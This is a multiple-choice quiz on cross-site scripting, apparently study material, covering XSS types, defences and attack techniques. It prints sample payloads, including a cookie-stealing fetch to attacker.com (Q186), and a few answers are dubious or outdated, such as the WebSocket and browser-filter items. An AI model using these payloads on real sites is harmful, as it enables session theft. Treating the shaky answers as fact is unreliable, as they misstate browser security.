105. How can input validation help mitigate XSS risks?

A) By allowing all special characters
B) By checking and rejecting unexpected characters in user input
C) By replacing user input with a generic message
D) By enabling all JavaScript functions

Answer: B) By checking and rejecting unexpected characters in user input
Explanation: Input validation ensures that only expected data types and formats are accepted, reducing the risk of XSS.


106. Which of the following is not a recommended security practice for preventing XSS?

A) Using allowlists instead of blocklists
B) Encoding output before displaying it
C) Allowing unrestricted user input
D) Implementing a Content Security Policy (CSP)

Answer: C) Allowing unrestricted user input
Explanation: Allowing unrestricted user input without sanitization makes applications vulnerable to XSS.


107. Why is Reflected XSS considered less dangerous than Stored XSS?

A) It does not persist in the application
B) It cannot steal user credentials
C) It only works on old browsers
D) It cannot be executed automatically

Answer: A) It does not persist in the application
Explanation: Reflected XSS requires user interaction, while Stored XSS persists and can affect multiple users.


108. What is an effective way to test for DOM-based XSS?

A) Inserting <script>alert(1)</script> and monitoring JavaScript execution
B) Checking the page source for script tags
C) Disabling all security features
D) Using a VPN

Answer: A) Inserting <script>alert(1)</script> and monitoring JavaScript execution
Explanation: If the input is reflected and executed in the DOM without being sanitized, it indicates a DOM-based XSS vulnerability.


109. What happens when JavaScript is disabled in a browser?

A) XSS attacks are completely prevented
B) Websites may break, but stored XSS scripts still execute
C) XSS attacks shift to other vectors, like phishing
D) It only affects Reflected XSS

Answer: C) XSS attacks shift to other vectors, like phishing
Explanation: Disabling JavaScript mitigates XSS, but attackers can still exploit other security weaknesses.


110. Which of the following is an advanced technique for bypassing XSS defenses?

A) Encoding payloads using multiple layers of obfuscation
B) Using plain text input
C) Blocking all user input
D) Disabling CSP headers

Answer: A) Encoding payloads using multiple layers of obfuscation
Explanation: Attackers use encoding and obfuscation techniques to evade security filters and execute malicious scripts.


111. Why is escaping output important in preventing XSS?

A) It makes the webpage load faster
B) It ensures that user input is not interpreted as executable code
C) It encrypts user input before displaying it
D) It disables JavaScript on the website

Answer: B) It ensures that user input is not interpreted as executable code
Explanation: Escaping output converts special characters like <, >, and & into harmless equivalents to prevent script execution.


112. What is a common attack goal of XSS?

A) To modify website performance
B) To execute malicious scripts in the victim’s browser
C) To disable HTML rendering
D) To manipulate the website’s CSS

Answer: B) To execute malicious scripts in the victim’s browser
Explanation: XSS enables attackers to run scripts that can steal data, hijack sessions, or deface websites.


113. Which of the following is a secure way to handle user input in a web application?

A) Allowing unrestricted HTML input
B) Encoding output before rendering it
C) Using innerHTML for dynamic content
D) Accepting JavaScript-based user input

Answer: B) Encoding output before rendering it
Explanation: Encoding output ensures that user input is displayed as plain text rather than executed as a script.


114. What makes document.referrer potentially dangerous in XSS attacks?

A) It allows attackers to steal cookies
B) It can be manipulated to execute malicious scripts if improperly used
C) It disables CSP headers
D) It removes all HTML tags from user input

Answer: B) It can be manipulated to execute malicious scripts if improperly used
Explanation: If a site directly uses document.referrer in a vulnerable context, attackers can manipulate it to inject and execute scripts.


115. How do attackers use XSS to deface websites?

A) By modifying server-side code
B) By injecting JavaScript to change page content dynamically
C) By replacing CSS stylesheets
D) By forcing the browser to delete cookies

Answer: B) By injecting JavaScript to change page content dynamically
Explanation: XSS enables attackers to manipulate the page content, leading to defacement.


116. Why is localStorage a common target for XSS attacks?

A) It is stored in an external database
B) It can be accessed by JavaScript, making it vulnerable to theft
C) It encrypts all stored data
D) It automatically deletes stored data

Answer: B) It can be accessed by JavaScript, making it vulnerable to theft
Explanation: Any JavaScript running in the context of the page can access localStorage, making it susceptible to XSS-based theft.


117. Which security measure is ineffective against XSS?

A) Using HTTPS
B) Validating and sanitizing user inputs
C) Implementing a strong CSP
D) Encoding output before rendering

Answer: A) Using HTTPS
Explanation: HTTPS protects data in transit but does not prevent XSS, as the attack occurs within the browser.


118. How can window.name be exploited in an XSS attack?

A) It allows remote code execution
B) It can be manipulated to store and retrieve malicious scripts
C) It prevents session hijacking
D) It blocks CSP policies

Answer: B) It can be manipulated to store and retrieve malicious scripts
Explanation: window.name persists across page reloads and can store data that attackers can exploit.


119. What is an XSS worm?

A) A virus that spreads through SQL Injection
B) A self-replicating XSS payload that spreads between users
C) A browser feature that prevents XSS
D) A method of blocking malicious scripts

Answer: B) A self-replicating XSS payload that spreads between users
Explanation: XSS worms propagate by exploiting stored XSS to infect multiple users, as seen in the MySpace Samy Worm.


120. How can CSP be bypassed in some cases?

A) By disabling JavaScript in the browser
B) By using JSON-based injection techniques
C) By leveraging trusted third-party sources allowed in the CSP
D) By modifying CSS files

Answer: C) By leveraging trusted third-party sources allowed in the CSP
Explanation: If a site allows unsafe third-party sources, attackers can inject malicious scripts from those trusted origins.


121. What is “Session Riding” in relation to XSS?

A) Exploiting session cookies to impersonate users
B) Bypassing login screens using URL manipulation
C) Injecting CSS to change session tokens
D) Disabling CSP headers

Answer: A) Exploiting session cookies to impersonate users
Explanation: XSS can be used to steal session cookies, allowing attackers to hijack user sessions.


122. How do modern browsers help protect against Reflected XSS?

A) By automatically blocking all JavaScript execution
B) By enabling built-in XSS filters
C) By forcing all websites to use CSP
D) By disabling cookie storage

Answer: B) By enabling built-in XSS filters
Explanation: Some browsers have built-in XSS filters that detect and block malicious scripts in reflected attacks.


123. What is an effective way to prevent DOM-based XSS?

A) Using innerHTML for all content updates
B) Avoiding dynamic updates with JavaScript
C) Using textContent instead of innerHTML for untrusted data
D) Storing all user input in a database

Answer: C) Using textContent instead of innerHTML for untrusted data
Explanation: textContent treats input as plain text, preventing the execution of injected scripts.


124. Why is Base64 encoding sometimes ineffective for XSS prevention?

A) Browsers do not support Base64
B) Attackers can decode and execute scripts after Base64 encoding
C) It slows down page rendering
D) It prevents all JavaScript execution

Answer: B) Attackers can decode and execute scripts after Base64 encoding
Explanation: Base64-encoded payloads can be decoded and executed dynamically, making Base64 encoding ineffective for preventing XSS.


125. What is a Shadow DOM, and how can it impact XSS?

A) A security feature that blocks XSS
B) A method for isolating JavaScript execution
C) A way to store encrypted user data
D) A browser caching mechanism

Answer: B) A method for isolating JavaScript execution
Explanation: The Shadow DOM can isolate scripts, but if improperly configured, it can still be exploited for XSS.


126. How can WebAssembly (WASM) introduce new XSS attack vectors?

A) WASM allows JavaScript to be executed in new contexts
B) WASM disables CSP protections
C) WASM only runs on secure websites
D) WASM blocks all script execution

Answer: A) WASM allows JavaScript to be executed in new contexts
Explanation: WASM can enable execution of malicious scripts if used improperly in web applications.


127. What is a race condition in the context of XSS?

A) Two scripts executing simultaneously, leading to unexpected behavior
B) A script that executes faster than normal
C) A delay in JavaScript execution
D) A method of speeding up web pages

Answer: A) Two scripts executing simultaneously, leading to unexpected behavior
Explanation: Race conditions can lead to unintended script execution if an attacker exploits the timing of events.


128. What is a common mistake that makes CSP ineffective against XSS?

A) Allowing unsafe-inline in CSP rules
B) Using HTTPS for scripts
C) Blocking third-party resources
D) Using JavaScript frameworks

Answer: A) Allowing unsafe-inline in CSP rules
Explanation: unsafe-inline allows inline scripts to execute, defeating the purpose of CSP in preventing XSS.


129. How do sandbox attributes in iframes help prevent XSS?

A) They disable JavaScript execution inside the iframe
B) They encrypt all iframe content
C) They allow only secure scripts to run
D) They force all websites to use HTTPS

Answer: A) They disable JavaScript execution inside the iframe
Explanation: sandbox attributes restrict iframe behavior, reducing the risk of XSS exploitation.


130. What is the primary reason attackers use WebSockets in XSS attacks?

A) To bypass same-origin policy restrictions
B) To prevent browser security warnings
C) To disable cookies
D) To make scripts execute faster

Answer: A) To bypass same-origin policy restrictions
Explanation: WebSockets allow cross-origin communication, making them a potential target for XSS exploitation.


131. Why is JSON commonly targeted in XSS attacks?

A) JSON responses are always encrypted
B) Attackers can inject scripts into improperly sanitized JSON data
C) JSON automatically blocks script execution
D) JSON cannot be modified by an attacker

Answer: B) Attackers can inject scripts into improperly sanitized JSON data
Explanation: If a web application improperly handles JSON data, it can allow script injection, leading to XSS vulnerabilities.


132. How can an attacker exploit the postMessage API for XSS?

A) By sending malicious data to an iframe or a cross-origin window
B) By disabling JavaScript in the victim’s browser
C) By modifying browser security settings
D) By blocking HTTP requests

Answer: A) By sending malicious data to an iframe or a cross-origin window
Explanation: If postMessage is used without validating the sender and data, attackers can inject malicious scripts.


133. Which CSP directive is specifically designed to control script execution?

A) frame-src
B) script-src
C) connect-src
D) img-src

Answer: B) script-src
Explanation: The script-src directive restricts JavaScript execution sources, helping to prevent XSS attacks.


134. What is the primary purpose of the sandbox attribute in an iframe?

A) It allows JavaScript execution
B) It isolates the iframe from running untrusted scripts
C) It disables cookies
D) It improves page load speed

Answer: B) It isolates the iframe from running untrusted scripts
Explanation: The sandbox attribute restricts iframe capabilities, reducing XSS risks.


135. How can an attacker use an XSS payload to perform keylogging?

A) By injecting a script that records keystrokes and sends them to a remote server
B) By modifying CSS stylesheets
C) By blocking JavaScript execution
D) By encrypting all form inputs

Answer: A) By injecting a script that records keystrokes and sends them to a remote server
Explanation: XSS can be used to log keystrokes, capturing user credentials and sensitive information.


136. What is the difference between Self-XSS and traditional XSS?

A) Self-XSS tricks users into executing scripts on their own browsers
B) Self-XSS affects all users on a website
C) Traditional XSS requires user authentication
D) Self-XSS cannot be exploited for malicious purposes

Answer: A) Self-XSS tricks users into executing scripts on their own browsers
Explanation: Self-XSS occurs when an attacker tricks a user into pasting and executing a script in their browser’s developer console.


137. What is the main limitation of browser-based XSS filters?

A) They can be bypassed with obfuscation techniques
B) They block all JavaScript execution
C) They disable user inputs
D) They only work in incognito mode

Answer: A) They can be bypassed with obfuscation techniques
Explanation: Attackers can encode or obfuscate XSS payloads to evade browser-based XSS filters.


138. Why is innerHTML dangerous for inserting untrusted user input?

A) It modifies CSS styles
B) It executes scripts inside HTML content
C) It prevents script execution
D) It only works in specific browsers

Answer: B) It executes scripts inside HTML content
Explanation: innerHTML renders HTML and JavaScript, making it a common target for XSS attacks.


139. How can an attacker use XSS to hijack a user’s session?

A) By injecting a script to steal cookies using document.cookie
B) By modifying browser cache settings
C) By encrypting user input
D) By injecting malformed SQL queries

Answer: A) By injecting a script to steal cookies using document.cookie
Explanation: Attackers use XSS to access session cookies, allowing them to impersonate the user.


140. What does the X-Content-Type-Options: nosniff header do?

A) It prevents MIME-type sniffing, reducing the risk of script execution
B) It blocks inline scripts
C) It encrypts user data
D) It forces browsers to disable JavaScript

Answer: A) It prevents MIME-type sniffing, reducing the risk of script execution
Explanation: This header ensures that the browser strictly follows MIME types, reducing attack vectors like MIME-based XSS.


141. Why should developers avoid dynamically inserting <script> tags with user input?

A) It can lead to XSS attacks by executing untrusted scripts
B) It improves website performance
C) It disables JavaScript execution
D) It makes debugging easier

Answer: A) It can lead to XSS attacks by executing untrusted scripts
Explanation: Dynamically inserting <script> tags with user input can lead to stored or reflected XSS vulnerabilities.


142. How can WebRTC be exploited in XSS attacks?

A) By allowing attackers to inject scripts through real-time communication channels
B) By disabling JavaScript in the browser
C) By modifying HTTP headers
D) By restricting access to third-party resources

Answer: A) By allowing attackers to inject scripts through real-time communication channels
Explanation: WebRTC can expose user IPs and may be used to transmit malicious scripts if improperly secured.


143. What is a common way attackers obfuscate XSS payloads?

A) Using URL encoding (%3Cscript%3E)
B) Encrypting JavaScript files
C) Using CSS injections
D) Disabling JavaScript execution

Answer: A) Using URL encoding (%3Cscript%3E)
Explanation: URL encoding disguises scripts to bypass security filters.


144. How does Subresource Integrity (SRI) help prevent XSS?

A) It ensures that external scripts are not tampered with
B) It disables all JavaScript execution
C) It blocks all third-party scripts
D) It forces browsers to use inline scripts

Answer: A) It ensures that external scripts are not tampered with
Explanation: SRI allows websites to verify the integrity of third-party scripts, reducing XSS risks.


145. Why is setAttribute("onclick", "...") dangerous for user input handling?

A) It allows direct execution of injected JavaScript
B) It blocks all JavaScript execution
C) It improves website security
D) It prevents XSS attacks

Answer: A) It allows direct execution of injected JavaScript
Explanation: setAttribute("onclick", "...") can be exploited if used with unsanitized user input.


146. What is an “XSS beacon”?

A) A hidden XSS script that sends stolen data to an attacker-controlled server
B) A JavaScript debugging tool
C) A web browser feature
D) A method for blocking JavaScript execution

Answer: A) A hidden XSS script that sends stolen data to an attacker-controlled server
Explanation: Attackers use XSS beacons to send stolen session data or credentials to an external server.


147. Why is eval() particularly dangerous in XSS attacks?

A) It executes arbitrary JavaScript code
B) It blocks security headers
C) It only works in Internet Explorer
D) It improves performance

Answer: A) It executes arbitrary JavaScript code
Explanation: eval() can execute untrusted JavaScript, making it a critical security risk.


148. How can developers test for DOM-based XSS?

A) By injecting document.location= payloads in input fields
B) By running a network penetration test
C) By disabling CSP headers
D) By checking HTTP response headers

Answer: A) By injecting document.location= payloads in input fields
Explanation: DOM-based XSS can be tested by manipulating the DOM dynamically in the browser.


149. Which JavaScript property is commonly used in XSS payloads?

A) document.cookie
B) window.onload
C) console.log()
D) innerText

Answer: A) document.cookie
Explanation: document.cookie is often targeted to steal session data.


150. What is a good defense against XSS attacks in React applications?

A) Using dangerouslySetInnerHTML
B) Avoiding direct manipulation of the DOM
C) Allowing unrestricted HTML rendering
D) Disabling JavaScript

Answer: B) Avoiding direct manipulation of the DOM
Explanation: Secure React applications avoid dangerouslySetInnerHTML and use proper state management to prevent XSS.


151. What is a common mistake that leads to XSS vulnerabilities?

A) Using parameterized queries for database access
B) Allowing user input to be executed as JavaScript
C) Encoding user input before rendering
D) Disabling JavaScript execution

Answer: B) Allowing user input to be executed as JavaScript
Explanation: Allowing user input to be executed as JavaScript without proper sanitization or encoding leads to XSS vulnerabilities.


152. Which of the following is a valid example of an XSS payload?

A) <script>alert('XSS');</script>
B) SELECT * FROM users WHERE id='1'
C) rm -rf /home/user
D) cd /var/www/html

Answer: A) <script>alert('XSS');</script>
Explanation: XSS payloads inject and execute malicious JavaScript within a vulnerable web page.


153. Why are dynamically generated error messages a potential XSS risk?

A) They allow attackers to inject malicious scripts into responses
B) They expose the database schema
C) They make the website load slower
D) They disable security features

Answer: A) They allow attackers to inject malicious scripts into responses
Explanation: If error messages include unescaped user input, they can be exploited for XSS attacks.


154. How can input validation help prevent XSS?

A) By checking and rejecting unexpected characters before rendering input
B) By allowing all input to be executed as scripts
C) By preventing SQL injection
D) By enabling JavaScript in browsers

Answer: A) By checking and rejecting unexpected characters before rendering input
Explanation: Proper input validation ensures that only expected data types and formats are accepted, reducing the risk of XSS.


155. Which HTTP security header can help mitigate XSS attacks?

A) Strict-Transport-Security
B) X-XSS-Protection
C) Cache-Control
D) ETag

Answer: B) X-XSS-Protection
Explanation: X-XSS-Protection instructs browsers to detect and block reflected XSS attacks.


156. What is a common technique for bypassing XSS filters?

A) Using encrypted cookies
B) Encoding payloads with hexadecimal, Base64, or URL encoding
C) Using HTTPS for communication
D) Modifying database queries

Answer: B) Encoding payloads with hexadecimal, Base64, or URL encoding
Explanation: Attackers use encoding techniques to obfuscate their scripts and evade detection by security filters.


157. Why is an open redirect vulnerability often paired with XSS?

A) To trick users into visiting malicious websites
B) To slow down the website
C) To modify HTTP headers
D) To disable browser security settings

Answer: A) To trick users into visiting malicious websites
Explanation: Open redirects combined with XSS allow attackers to redirect victims to phishing pages or malicious websites.


158. What is an example of an XSS payload using the onmouseover event?

A) <a href="#" onmouseover="alert('XSS')">Hover me</a>
B) SELECT * FROM users WHERE id=1;
C) <iframe src="xss.html"></iframe>
D) echo "XSS attack"

Answer: A) <a href="#" onmouseover="alert('XSS')">Hover me</a>
Explanation: JavaScript event handlers like onmouseover can be exploited to execute XSS payloads.


159. Why is window.location dangerous when used with unvalidated user input?

A) It redirects users without validation, allowing XSS exploitation
B) It encrypts all JavaScript files
C) It disables security headers
D) It prevents script execution

Answer: A) It redirects users without validation, allowing XSS exploitation
Explanation: If window.location is modified by user input without proper validation, it can be used to inject and execute scripts.


160. What does CSP frame-ancestors 'none' do?

A) It prevents the page from being embedded in iframes
B) It blocks all external JavaScript
C) It forces scripts to execute in a secure sandbox
D) It encrypts all user input

Answer: A) It prevents the page from being embedded in iframes
Explanation: This directive prevents clickjacking attacks by blocking unauthorized embedding in iframes.


161. Which of the following is an effective way to prevent Reflected XSS?

A) Storing all user input in session storage
B) Encoding user input before displaying it in HTML
C) Allowing inline JavaScript execution
D) Using document.write() for all page content

Answer: B) Encoding user input before displaying it in HTML
Explanation: Encoding user input ensures that special characters are displayed as plain text rather than being executed as scripts.


162. What is the role of sanitization libraries like DOMPurify in XSS prevention?

A) They remove malicious scripts from user-generated content
B) They encrypt cookies for better security
C) They disable JavaScript execution
D) They allow all user input to be stored without modification

Answer: A) They remove malicious scripts from user-generated content
Explanation: Libraries like DOMPurify sanitize HTML content to prevent XSS attacks.


163. How does an attacker exploit XSS through hidden form fields?

A) By injecting JavaScript that modifies the form fields before submission
B) By changing the CSS properties of the form
C) By deleting the form fields
D) By using a VPN to hide their IP

Answer: A) By injecting JavaScript that modifies the form fields before submission
Explanation: Attackers can use XSS to modify hidden form fields, potentially altering data sent to the server.


164. What is an effective way to prevent DOM-based XSS?

A) Using textContent instead of innerHTML
B) Disabling all JavaScript execution
C) Using a CAPTCHA system
D) Storing input values in local storage

Answer: A) Using textContent instead of innerHTML
Explanation: textContent treats input as plain text, preventing it from being interpreted as executable code.


165. Why is it dangerous to use eval() with user input?

A) It executes user-provided JavaScript, leading to XSS risks
B) It disables cookies
C) It prevents SQL injection
D) It only works in modern browsers

Answer: A) It executes user-provided JavaScript, leading to XSS risks
Explanation: eval() should be avoided because it can execute arbitrary and potentially malicious JavaScript.


166. Which tool is commonly used to test for XSS vulnerabilities?

A) Burp Suite
B) Wireshark
C) Nmap
D) Nikto

Answer: A) Burp Suite
Explanation: Burp Suite is widely used for web security testing, including detecting XSS vulnerabilities.


167. How does an attacker exploit an iframe for XSS?

A) By embedding a malicious iframe that loads an external script
B) By changing the iframe’s border color
C) By using HTTPS instead of HTTP
D) By modifying browser cache settings

Answer: A) By embedding a malicious iframe that loads an external script
Explanation: Attackers use iframes to load malicious scripts or redirect users to compromised sites.


168. What is “JavaScript Injection” in the context of XSS?

A) Injecting and executing malicious JavaScript in a vulnerable web application
B) Using JavaScript to encrypt user input
C) Disabling JavaScript on the client side
D) Removing all security headers from a website

Answer: A) Injecting and executing malicious JavaScript in a vulnerable web application
Explanation: JavaScript Injection is a form of XSS where attackers insert malicious JavaScript into web applications.


169. What is an example of an XSS attack on a login page?

A) Injecting a keylogger script to steal entered credentials
B) Changing the background color of the login form
C) Disabling CAPTCHA verification
D) Using a strong password

Answer: A) Injecting a keylogger script to steal entered credentials
Explanation: Attackers can use XSS to inject keyloggers that capture user credentials.


170. Why is http-equiv="Content-Security-Policy" sometimes used in meta tags?

A) To enforce CSP rules even if headers are not configured
B) To disable all JavaScript execution
C) To store session data in cookies
D) To block form submissions

Answer: A) To enforce CSP rules even if headers are not configured
Explanation: CSP can be set via meta tags if the server does not send proper security headers.


171. What is an XSS payload that exploits the onerror event?

A) <img src="invalid.jpg" onerror="alert('XSS')">
B) <script>alert('XSS')</script>
C) document.cookie
D) SELECT * FROM users WHERE id=1;

Answer: A) <img src="invalid.jpg" onerror="alert('XSS')">
Explanation: The onerror event triggers when an image fails to load, making it a common technique for XSS payload execution.


172. How can WebSockets be abused in XSS attacks?

A) By transmitting malicious scripts if user input is not validated
B) By disabling browser security settings
C) By modifying the server’s response headers
D) By encrypting HTTP traffic

Answer: A) By transmitting malicious scripts if user input is not validated
Explanation: WebSockets allow bidirectional communication, and if not properly validated, attackers can send malicious scripts.


173. What does the CSP directive unsafe-inline allow?

A) Inline JavaScript execution
B) Only external scripts to run
C) Blocking all scripts from running
D) Automatic encryption of JavaScript files

Answer: A) Inline JavaScript execution
Explanation: unsafe-inline permits inline scripts, making it a security risk as it allows XSS execution.


174. How does an attacker exploit innerHTML for XSS?

A) By injecting a script inside an element that uses innerHTML
B) By encrypting user data
C) By modifying CSS styles
D) By using a VPN

Answer: A) By injecting a script inside an element that uses innerHTML
Explanation: innerHTML interprets injected content as HTML and JavaScript, making it vulnerable to XSS.


175. What is “Reflected XSS via URL Parameters”?

A) XSS that executes when a malicious script is injected into a URL parameter
B) XSS that only works on old browsers
C) XSS that modifies database records
D) XSS that targets server-side code

Answer: A) XSS that executes when a malicious script is injected into a URL parameter
Explanation: Reflected XSS occurs when a script is passed via a URL and executed in the browser.


176. What is the risk of allowing user-generated JavaScript in a web application?

A) It can lead to stored XSS vulnerabilities
B) It improves performance
C) It helps encrypt cookies
D) It prevents SQL Injection

Answer: A) It can lead to stored XSS vulnerabilities
Explanation: Allowing users to insert JavaScript without proper filtering can enable stored XSS attacks.


177. Which function should be avoided when processing user input in JavaScript?

A) eval()
B) console.log()
C) parseInt()
D) JSON.stringify()

Answer: A) eval()
Explanation: eval() executes arbitrary JavaScript and is a common source of XSS vulnerabilities.


178. What is an “XSS scanner” used for?

A) To detect and test for XSS vulnerabilities in web applications
B) To encrypt JavaScript files
C) To log user activity
D) To bypass security headers

Answer: A) To detect and test for XSS vulnerabilities in web applications
Explanation: XSS scanners help identify and mitigate potential XSS vulnerabilities in applications.


179. How can JavaScript setTimeout() be exploited in an XSS attack?

A) By delaying the execution of a malicious script to bypass security filters
B) By encrypting user input
C) By blocking JavaScript execution
D) By modifying browser security settings

Answer: A) By delaying the execution of a malicious script to bypass security filters
Explanation: setTimeout() can be used to delay execution, sometimes allowing XSS payloads to bypass security checks.


180. Why should session cookies use the HttpOnly flag?

A) To prevent JavaScript from accessing cookies, reducing the risk of XSS attacks
B) To encrypt all cookies
C) To disable JavaScript in the browser
D) To block all user input

Answer: A) To prevent JavaScript from accessing cookies, reducing the risk of XSS attacks
Explanation: HttpOnly prevents client-side JavaScript from accessing cookies, mitigating XSS-based session hijacking.


181. What is a common attack scenario for DOM-based XSS?

A) Manipulating a JavaScript function that updates the DOM with user input
B) Encrypting HTTP requests
C) Using SQL Injection to modify the DOM
D) Sending phishing emails

Answer: A) Manipulating a JavaScript function that updates the DOM with user input
Explanation: DOM-based XSS occurs when JavaScript dynamically modifies the page using unvalidated user input.


182. What is the impact of “Clickjacking” when combined with XSS?

A) It can trick users into clicking on hidden malicious elements
B) It disables JavaScript
C) It modifies HTTP headers
D) It prevents session hijacking

Answer: A) It can trick users into clicking on hidden malicious elements
Explanation: Clickjacking combined with XSS can force users to perform unintended actions on a website.


183. What does the Referrer-Policy: no-referrer header do?

A) It prevents browsers from sending the HTTP referrer header, reducing data leaks
B) It encrypts JavaScript files
C) It disables cookies
D) It blocks all scripts

Answer: A) It prevents browsers from sending the HTTP referrer header, reducing data leaks
Explanation: The no-referrer policy prevents sensitive referrer information from being shared across requests.


184. What is an XSS “payload”?

A) A malicious script injected into a vulnerable web application
B) A secure method for encoding user data
C) A tool used to prevent XSS attacks
D) A framework for writing JavaScript

Answer: A) A malicious script injected into a vulnerable web application
Explanation: XSS payloads are malicious scripts injected into vulnerable web applications.


185. Why is document.URL dangerous in the context of XSS?

A) It can be modified by attackers to execute scripts
B) It encrypts JavaScript files
C) It blocks user input
D) It disables browser security settings

Answer: A) It can be modified by attackers to execute scripts
Explanation: If improperly handled, document.URL can be exploited to execute XSS payloads.


186. What is an example of an XSS payload that exfiltrates cookies?

A) <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
B) SELECT * FROM users WHERE id=1;
C) console.log('Hello, world!')
D) alert('This is a test')

Answer: A) <script>fetch('http://attacker.com?cookie='+document.cookie)</script>
Explanation: This script steals cookies by sending them to an attacker’s server.


187. What is the main weakness of using a blacklist approach to prevent XSS?

A) Attackers can use encoding techniques to bypass filters
B) It completely blocks JavaScript execution
C) It improves website performance
D) It encrypts all user input

Answer: A) Attackers can use encoding techniques to bypass filters
Explanation: Blacklist-based filtering can be bypassed using various encoding techniques.


188. What is an example of an event-driven XSS attack?

A) onmouseover="alert('XSS')"
B) document.cookie
C) console.log('Hello!')
D) localStorage.getItem('data')

Answer: A) onmouseover="alert('XSS')"
Explanation: JavaScript event handlers like onmouseover can be exploited to trigger XSS payloads.


189. What is a “Polyglot XSS Payload”?

A) A payload that works in multiple contexts and encoding schemes
B) A script that encrypts JavaScript files
C) A method to block XSS
D) A framework for secure JavaScript

Answer: A) A payload that works in multiple contexts and encoding schemes
Explanation: Polyglot XSS payloads are crafted to work across different security filters and execution environments.


190. What does X-Frame-Options: DENY do?

A) It prevents the website from being embedded in an iframe
B) It encrypts user input
C) It allows JavaScript execution
D) It enables inline scripts

Answer: A) It prevents the website from being embedded in an iframe
Explanation: X-Frame-Options: DENY protects against Clickjacking attacks by blocking iframe embedding.


191. What does the X-Content-Type-Options: nosniff header prevent?

A) MIME-type sniffing attacks that can lead to script execution
B) JavaScript execution from third-party domains
C) Automatic encryption of cookies
D) Disabling of JavaScript on the website

Answer: A) MIME-type sniffing attacks that can lead to script execution
Explanation: This header prevents browsers from interpreting non-script files as scripts, reducing the risk of content-type-based XSS attacks.


192. How does an attacker use a Cross-Site Script Inclusion (XSSI) attack?

A) By stealing JSON responses that contain sensitive data
B) By injecting JavaScript into HTML comments
C) By modifying CSS styles
D) By encrypting user input

Answer: A) By stealing JSON responses that contain sensitive data
Explanation: XSSI occurs when an attacker loads a site’s JSON API response in their own page to extract sensitive data.


193. What is an effective way to prevent XSSI attacks?

A) Using JSON with a prefix that prevents script execution (")]}',")
B) Storing all user data in cookies
C) Using only HTTPS
D) Disabling JavaScript execution

Answer: A) Using JSON with a prefix that prevents script execution (")]}',")
Explanation: Adding a prefix like ")]}'," makes JSON responses invalid as JavaScript, preventing them from being used in XSSI attacks.


194. What is an XSS payload that exploits JavaScript URL schemes?

A) <a href="javascript:alert('XSS')">Click me</a>
B) console.log('XSS test')
C) <input type="hidden" name="xss" value="<script>">
D) SELECT * FROM users WHERE id=1;

Answer: A) <a href="javascript:alert('XSS')">Click me</a>
Explanation: The javascript: URL scheme can be used to execute arbitrary JavaScript when a user clicks a link.


195. What is the risk of allowing document.write() to insert user-generated content?

A) It can execute malicious scripts inserted by an attacker
B) It improves website performance
C) It prevents XSS
D) It disables JavaScript execution

Answer: A) It can execute malicious scripts inserted by an attacker
Explanation: document.write() directly inserts HTML content, making it vulnerable to XSS if used with untrusted input.


196. What is a “Malvertising” attack involving XSS?

A) An attacker injects malicious scripts into online advertisements
B) A script that modifies CSS styles
C) A technique used for password hashing
D) An attack that blocks JavaScript execution

Answer: A) An attacker injects malicious scripts into online advertisements
Explanation: Malvertising uses ad networks to distribute XSS payloads, infecting users who view or interact with the ads.


197. Why should developers avoid using innerHTML for dynamically inserting untrusted content?

A) It treats the content as executable HTML and JavaScript
B) It encrypts the content
C) It automatically encodes user input
D) It blocks all JavaScript execution

Answer: A) It treats the content as executable HTML and JavaScript
Explanation: innerHTML interprets inserted content as HTML, allowing script execution if not properly sanitized.


198. How can JavaScript’s fetch() function be abused in XSS attacks?

A) By sending stolen data to an attacker-controlled server
B) By modifying local storage
C) By blocking security headers
D) By disabling cookies

Answer: A) By sending stolen data to an attacker-controlled server
Explanation: fetch() can be used in XSS payloads to exfiltrate sensitive data, such as authentication tokens or session cookies.


199. What is the impact of a self-executing JavaScript function in an XSS attack?

A) It runs immediately when injected into a vulnerable site
B) It disables JavaScript execution
C) It modifies database records
D) It blocks all HTML rendering

Answer: A) It runs immediately when injected into a vulnerable site
Explanation: Self-executing JavaScript functions ((function(){})()) allow XSS payloads to run as soon as they are injected.


200. What is an advanced technique for bypassing CSP protections in XSS attacks?

A) Exploiting JSONP endpoints to execute scripts
B) Disabling all JavaScript in the browser
C) Using only HTTPS requests
D) Encrypting user input

Answer: A) Exploiting JSONP endpoints to execute scripts
Explanation: JSONP allows script execution from third-party sources, which can be abused to bypass CSP restrictions.